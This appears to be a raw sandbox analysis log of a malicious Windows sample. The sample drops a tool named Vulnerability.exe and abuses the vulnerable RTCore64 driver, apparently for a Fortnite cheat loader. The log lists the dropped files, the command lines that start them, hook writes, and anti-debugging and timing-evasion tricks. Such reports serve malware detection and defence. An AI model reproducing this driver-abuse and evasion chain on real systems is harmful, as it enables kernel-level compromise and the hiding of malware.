Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E45E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 5_2_00007FF7738E45E0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E3CE0 5_2_00007FF7738E3CE0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E1330 5_2_00007FF7738E1330
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F1630 5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E45E0 5_2_00007FF7738E45E0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E6440 5_2_00007FF7738E6440
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738EFBF0 5_2_00007FF7738EFBF0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E6810 5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E5010 5_2_00007FF7738E5010
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F3B60 5_2_00007FF7738F3B60
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E72B0 5_2_00007FF7738E72B0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E7EA0 5_2_00007FF7738E7EA0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F32C0 5_2_00007FF7738F32C0
Source: C:\Windows\Vulnerability.exe Code function: String function: 00007FF7738EA3C0 appears 102 times
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Source: driver[1].sys.0.dr Binary string: \Device\{83040329-923403830}
Source: Vulnerability.exe.0.dr Binary string: \Device\PhysicalMemory
Source: Vulnerability.exe.0.dr Binary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engine Classification label: mal100.expl.evad.winEXE@25/5@1/3
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 5_2_00007FF7738F14C0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60023779-100a-4137-a2cb-f060494dee00
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Iyto7FYCJO.exe ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\Iyto7FYCJO.exe "C:\Users\user\Desktop\Iyto7FYCJO.exe"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: d3d9.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Section loaded: schannel.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: apphelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: msvcp140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dbghelp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: urlmon.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Vulnerability.exe Section loaded: iertutil.dll
Source: C:\Windows\Vulnerability.exe Section loaded: srvcli.dll
Source: C:\Windows\Vulnerability.exe Section loaded: netutils.dll
Source: C:\Windows\Vulnerability.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Vulnerability.exe Section loaded: uxtheme.dll
Source: C:\Windows\Vulnerability.exe Section loaded: wininet.dll
Source: C:\Windows\Vulnerability.exe Section loaded: sspicli.dll
Source: C:\Windows\Vulnerability.exe Section loaded: windows.storage.dll
Source: C:\Windows\Vulnerability.exe Section loaded: wldp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: profapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Vulnerability.exe Section loaded: winhttp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: mswsock.dll
Source: C:\Windows\Vulnerability.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: winnsi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: msasn1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: cryptsp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: rsaenh.dll
Source: C:\Windows\Vulnerability.exe Section loaded: cryptbase.dll
Source: C:\Windows\Vulnerability.exe Section loaded: dnsapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Vulnerability.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Vulnerability.exe Section loaded: schannel.dll
Source: C:\Windows\Vulnerability.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ntasn1.dll
Source: C:\Windows\Vulnerability.exe Section loaded: gpapi.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ncrypt.dll
Source: C:\Windows\Vulnerability.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Iyto7FYCJO.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Iyto7FYCJO.exe Static file information: File size 6070784 > 1048576
Source: Iyto7FYCJO.exe Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c9a00
Source: Iyto7FYCJO.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: Iyto7FYCJO.exe Static PE information: section name: _RDATA
Source: Iyto7FYCJO.exe Static PE information: section name: .vmp0
Source: Iyto7FYCJO.exe Static PE information: section name: .vmp1

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Windows\driver.sys
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Windows\Vulnerability.exe
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Memory written: PID: 1308 base: 7FF8C8A50008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Memory written: PID: 1308 base: 7FF8C88ED9F0 value: E9 20 26 16 00
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Memory written: PID: 1308 base: 7FF8C8A6000D value: E9 BB CB EB FF
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Memory written: PID: 1308 base: 7FF8C891CBC0 value: E9 5A 34 14 00
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe RDTSC instruction interceptor: First address: 7FF7A3036BA4 second address: 7FF7A3036BAD instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe RDTSC instruction interceptor: First address: 7FF7A300CFB8 second address: 7FF7A308E2DA instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 23360512h 0x00000008 call 00007F93C8DCC21Ch 0x0000000d inc ecx 0x0000000e push edi 0x0000000f jmp 00007F93C8E1CC87h 0x00000014 inc ecx 0x00000015 push ebx 0x00000016 pushfd 0x00000017 dec ecx 0x00000018 rcr ebx, cl 0x0000001a push eax 0x0000001b inc ecx 0x0000001c bt ebx, FFFFFFF4h 0x00000020 inc bp 0x00000022 bts ebx, ebp 0x00000025 inc ecx 0x00000026 push ebp 0x00000027 inc ecx 0x00000028 shr bl, cl 0x0000002a xchg al, ah 0x0000002c rcr ah, FFFFFF99h 0x0000002f inc ecx 0x00000030 push edx 0x00000031 inc bp 0x00000033 movsx ebx, cl 0x00000036 bswap eax 0x00000038 push ebx 0x00000039 inc esp 0x0000003a mov ebx, edi 0x0000003c push edx 0x0000003d inc sp 0x0000003f btr eax, esi 0x00000042 btc ax, FFE0h 0x00000047 inc cx 0x00000049 sar ebx, 6Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e inc ecx 0x0000004f xor bl, FFFFFFB7h 0x00000052 push ebp 0x00000053 inc eax 0x00000054 rol ch, 00000007h 0x00000057 push ecx 0x00000058 dec ebp 0x00000059 test edi, ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d bsf di, sp 0x00000061 inc ebp 0x00000062 cmp ch, ch 0x00000064 inc ecx 0x00000065 shr bl, cl 0x00000067 inc ecx 0x00000068 push eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe RDTSC instruction interceptor: First address: 7FF7A2B4D305 second address: 7FF7A2B4D335 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 00000043h 0x00000005 inc ecx 0x00000006 pop edx 0x00000007 inc cx 0x00000009 bt ebx, ecx 0x0000000c inc ecx 0x0000000d pop ebx 0x0000000e sal bl, cl 0x00000010 pop ebp 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 and esp, 7E967785h 0x0000001c dec esp 0x0000001d test edx, esp 0x0000001f inc ecx 0x00000020 pop ebp 0x00000021 inc cx 0x00000023 xor eax, 5C410F04h 0x00000029 dec eax 0x0000002a bt eax, 0Fh 0x0000002e cbw 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe RDTSC instruction interceptor: First address: 7FF7A2B613F1 second address: 7FF7A2B613FA instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Special instruction interceptor: First address: 7FF7A300CFA0 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Special instruction interceptor: First address: 7FF7A300CFB8 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 5_2_00007FF7738F14C0
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Dropped PE file which has not been started: C:\Windows\driver.sys
Source: C:\Windows\Vulnerability.exe API coverage: 7.5 %
Source: C:\Windows\System32\timeout.exe TID: 2300 Thread sleep count: 38 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 5_2_00007FF7738F3B60
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@SH
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWfonsjX
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Handle closed: DEADC0DE
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process queried: DebugObjectHandle
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF7738F4B58
